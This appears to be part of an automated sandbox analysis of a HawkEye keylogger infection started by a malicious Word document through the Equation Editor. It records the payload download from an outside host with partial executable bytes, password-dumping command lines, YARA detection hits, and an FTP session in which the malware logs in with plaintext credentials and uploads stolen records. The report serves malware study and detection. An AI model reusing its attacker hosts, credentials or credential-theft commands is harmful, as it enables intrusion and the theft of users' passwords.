                                                                                      Jul 28, 2021 17:01:16.922615051 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922637939 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922657013 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922658920 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922699928 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922723055 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922733068 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922740936 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.922776937 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.922802925 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:16.924477100 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166482925 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166510105 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166536093 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166578054 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166604996 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166625977 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166651964 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166660070 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166687012 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166717052 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166742086 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166750908 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166774035 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166815042 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166836023 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166845083 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166867971 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166877985 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166899920 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.166908979 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.166929960 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167138100 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167160988 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167175055 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167190075 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167258978 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167294025 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167299032 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167323112 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167330980 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167352915 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167366982 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167388916 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167397022 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167412996 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167418003 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167435884 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167443991 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167464018 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167568922 CEST8049167103.255.237.180192.168.2.22

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jul 28, 2021 17:01:16.151007891 CEST5219753192.168.2.228.8.8.8
                                                                                      Jul 28, 2021 17:01:16.174184084 CEST53521978.8.8.8192.168.2.22
                                                                                      Jul 28, 2021 17:01:16.174407005 CEST5219753192.168.2.228.8.8.8
                                                                                      Jul 28, 2021 17:01:16.197423935 CEST53521978.8.8.8192.168.2.22
                                                                                      Jul 28, 2021 17:01:21.274135113 CEST5309953192.168.2.228.8.8.8
                                                                                      Jul 28, 2021 17:01:21.297693014 CEST53530998.8.8.8192.168.2.22
                                                                                      Jul 28, 2021 17:01:22.159069061 CEST5283853192.168.2.228.8.8.8
                                                                                      Jul 28, 2021 17:01:22.193195105 CEST53528388.8.8.8192.168.2.22
                                                                                      Jul 28, 2021 17:01:22.201668978 CEST6120053192.168.2.228.8.8.8
                                                                                      Jul 28, 2021 17:01:22.238142014 CEST53612008.8.8.8192.168.2.22
                                                                                      Jul 28, 2021 17:01:41.888184071 CEST4954853192.168.2.228.8.8.8
                                                                                      Jul 28, 2021 17:01:41.909600019 CEST53495488.8.8.8192.168.2.22
                                                                                      Jul 28, 2021 17:02:02.531776905 CEST5562753192.168.2.228.8.8.8
                                                                                      Jul 28, 2021 17:02:02.579814911 CEST53556278.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jul 28, 2021 17:01:16.151007891 CEST192.168.2.228.8.8.80xe5d1Standard query (0)vecvietnam.com.vnA (IP address)IN (0x0001)
                                                                                      Jul 28, 2021 17:01:16.174407005 CEST192.168.2.228.8.8.80xe5d1Standard query (0)vecvietnam.com.vnA (IP address)IN (0x0001)
                                                                                      Jul 28, 2021 17:01:21.274135113 CEST192.168.2.228.8.8.80xf76aStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                      Jul 28, 2021 17:01:41.888184071 CEST192.168.2.228.8.8.80xff79Standard query (0)3.246.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                      Jul 28, 2021 17:02:02.531776905 CEST192.168.2.228.8.8.80xe1afStandard query (0)ftp.vngpack.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Jul 28, 2021 17:01:16.174184084 CEST8.8.8.8192.168.2.220xe5d1No error (0)vecvietnam.com.vn103.255.237.180A (IP address)IN (0x0001)
                                                                                      Jul 28, 2021 17:01:16.197423935 CEST8.8.8.8192.168.2.220xe5d1No error (0)vecvietnam.com.vn103.255.237.180A (IP address)IN (0x0001)
                                                                                      Jul 28, 2021 17:01:21.297693014 CEST8.8.8.8192.168.2.220xf76aNo error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)
                                                                                      Jul 28, 2021 17:01:41.909600019 CEST8.8.8.8192.168.2.220xff79Name error (3)3.246.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                      Jul 28, 2021 17:02:02.579814911 CEST8.8.8.8192.168.2.220xe1afNo error (0)ftp.vngpack.com45.141.152.18A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • vecvietnam.com.vn

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249167103.255.237.18080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jul 28, 2021 17:01:16.446929932 CEST0OUTGET /xpen3/09867654270721.PDF.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: vecvietnam.com.vn
                                                                                      Connection: Keep-Alive
                                                                                      Jul 28, 2021 17:01:16.679267883 CEST2INHTTP/1.1 200 OK
                                                                                      Server: Apache
                                                                                      Date: Wed, 28 Jul 2021 15:01:16 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 1383936
                                                                                      Last-Modified: Wed, 28 Jul 2021 00:30:49 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "6100a539-151e00"
                                                                                      Expires: Fri, 27 Aug 2021 15:01:16 GMT
                                                                                      Cache-Control: max-age=2592000
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c7 80 a0 3c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 0a 15 00 00 12 00 00 00 00 00 00 ce 29 15 00 00 20 00 00 00 40 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 29 15 00 4f 00 00 00 00 40 15 00 84 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 09 15 00 00 20 00 00 00 0a 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 0e 00 00 00 40 15 00 00 10 00 00 00 0c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 15 00 00 02 00 00 00 1c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 29 15 00 00 00 00 00 48 00 00 00 02 00 05 00 cc 31 14 00 b0 f7 00 00 03 00 02 00 ec 00 00 06 d0 8b 03 00 fa a5 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 4a ec 6a f8 97 e3 ec dd a8 de 31 58 b3 92 bf 6e 7d d6 d1 7c 1a 30 16 5f fe 66 6f 61 b5 17 5e 25 4d d0 96 03 24 43 31 ca 10 70 05 87 34 b9 93 18 8f b3 a1 c5 5d da 81 19 d5 0a f9 30 73 8b 28 90 7f 0c 0b e2 fa bc 49 3a a5 07 6c a8 2a 8e 2b 44 d2 57 d0 01 75 97 c7 71 4e 7c 2c 19 49 00 56 83 48 74 07 27 ae b0 1d d2 6a 67 20 55 6d d7 ed 46 de b4 5d 1c b9 26 1a e6 44 98 93 7d 8f 2f ef a4 b0 e8 60 b5 87 03 95 21 39 fc 96 0e 77 71 04 76 8d e4 3a 94 a1 39 c9 21 59 1f e2 16 1d 9e 43 3a 76 7a a4 84 76 38 be da 1e 3c e1 bc 8f 0c 6f d1 93 1d ee a9 f4 5b 03 76 1e 3f 5b 67 20 7f 04 9a b9 5c 96 fb cb 7e fe 55 26 5e 75 65 57 0d 90 4c ae 10 81 00 af 99 44 1a 77 2e 65 37 dc 56 ba 9e 37 47 02 33 74 72 05 15 1d 99 83 95 e5 9c 1f 11 ad 0e b7 0f fd 04 ea 20 17 7c 84 9d 19 c6 78 ce a3 d5 2d 0f 0a 5d d7 3c 0a 6b e1 15 15 ae 34 d9 0f 53 88 cd 9e ab a0 33 5c e1 1c f7 ed 67 fb 55 21 b4 f1 0f 6f 0f 07 50 36 7b 04 91 22 d4 0a 68 48 a9 8e c4 3d a9 2f f6 35 f8 b2 27 41 de 4d a2 6f 8b f3 60 bb 24 6a fe 4b 38 96 22 a6 0e 11 86 d7 b3 ae 44 d8 36 17 76 84 f9 d8 75 5b df 0e 56 2d 61 21 95 df a9 ab 23 3f 8e 78 05 13 0d 4f 27 e7 2b 4e 8d 2f 09 c9 39 73 7d da c0 4a f3 a3 6b 29 40 f3 45 ec 7a a5 2d 07 8a 04 49 bc 12 63 76 a9 b1 8d 2f 90 80 26 24 97 e7 22 62 cd e9 d8 4a ea 0d da
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<) @@ `|)O@` H.text `.rsrc@@@.reloc`@B)H1Jj1Xn}|0_foa^%M$C1p4]0s(I:l*+DWuqN|,IVHt'jg UmF]&D}/`!9wqv:9!YC:vzv8<o[v?[g \~U&^ueWLDw.e7V7G3tr |x-]<k4S3\gU!oP6{"hH=/5'AMo`$jK8"D6vu[V-a!#?xO'+N/9s}Jk)@Ez-Icv/&$"bJ


                                                                                      HTTPS Packets

                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                      Jul 28, 2021 17:01:21.439057112 CEST142.250.203.100443192.168.2.2249168CN=www.google.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jun 28 06:12:51 CEST 2021 Thu Jun 15 02:00:42 CEST 2017Mon Sep 20 06:12:50 CEST 2021 Wed Dec 15 01:00:42 CET 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                      CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                                                                                      FTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Jul 28, 2021 17:02:02.679359913 CEST214917145.141.152.18192.168.2.22220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.
                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login
                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                      Jul 28, 2021 17:02:02.685182095 CEST4917121192.168.2.2245.141.152.18USER newloggsaa@vngpack.com
                                                                                      Jul 28, 2021 17:02:02.720918894 CEST214917145.141.152.18192.168.2.22331 User newloggsaa@vngpack.com OK. Password required
                                                                                      Jul 28, 2021 17:02:02.721275091 CEST4917121192.168.2.2245.141.152.18PASS Xpen2000
                                                                                      Jul 28, 2021 17:02:02.777319908 CEST214917145.141.152.18192.168.2.22230 OK. Current restricted directory is /
                                                                                      Jul 28, 2021 17:02:02.812748909 CEST214917145.141.152.18192.168.2.22504 Unknown command
                                                                                      Jul 28, 2021 17:02:02.813843012 CEST4917121192.168.2.2245.141.152.18PWD
                                                                                      Jul 28, 2021 17:02:02.851243973 CEST214917145.141.152.18192.168.2.22257 "/" is your current location
                                                                                      Jul 28, 2021 17:02:02.851687908 CEST4917121192.168.2.2245.141.152.18TYPE I
                                                                                      Jul 28, 2021 17:02:02.886126041 CEST214917145.141.152.18192.168.2.22200 TYPE is now 8-bit binary
                                                                                      Jul 28, 2021 17:02:02.886689901 CEST4917121192.168.2.2245.141.152.18PASV
                                                                                      Jul 28, 2021 17:02:02.925394058 CEST214917145.141.152.18192.168.2.22227 Entering Passive Mode (45,141,152,18,253,175)
                                                                                      Jul 28, 2021 17:02:02.953810930 CEST4917121192.168.2.2245.141.152.18STOR HawkEye_Keylogger_Stealer_Records_783875 7.28.2021 5:26:06 PM.txt
                                                                                      Jul 28, 2021 17:02:02.988127947 CEST214917145.141.152.18192.168.2.22150 Accepted data connection
                                                                                      Jul 28, 2021 17:02:03.027231932 CEST214917145.141.152.18192.168.2.22226-File successfully transferred
                                                                                      226-File successfully transferred226 0.039 seconds (measured here), 38.00 Kbytes per second

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:17:00:40
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                      Imagebase:0x13f6f0000
                                                                                      File size:1424032 bytes
                                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:17:00:42
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:17:00:46
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\name.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\name.exe'
                                                                                      Imagebase:0x30000
                                                                                      File size:1383936 bytes
                                                                                      MD5 hash:FA0A3ED04EEC65D6D3FB55AA7D2497C1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 13%, ReversingLabs
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:17:01:01
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      Imagebase:0x1240000
                                                                                      File size:41136 bytes
                                                                                      MD5 hash:BB85AA6D90A4157ED799257072B265FF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.2363914554.00000000005E0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:moderate

                                                                                      General

                                                                                      Start time:17:01:14
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                      Imagebase:0x400000
                                                                                      File size:1170056 bytes
                                                                                      MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.2176599122.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:moderate

                                                                                      General

                                                                                      Start time:17:01:14
                                                                                      Start date:28/07/2021
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                      Imagebase:0x400000
                                                                                      File size:1170056 bytes
                                                                                      MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.2179402637.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:moderate

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >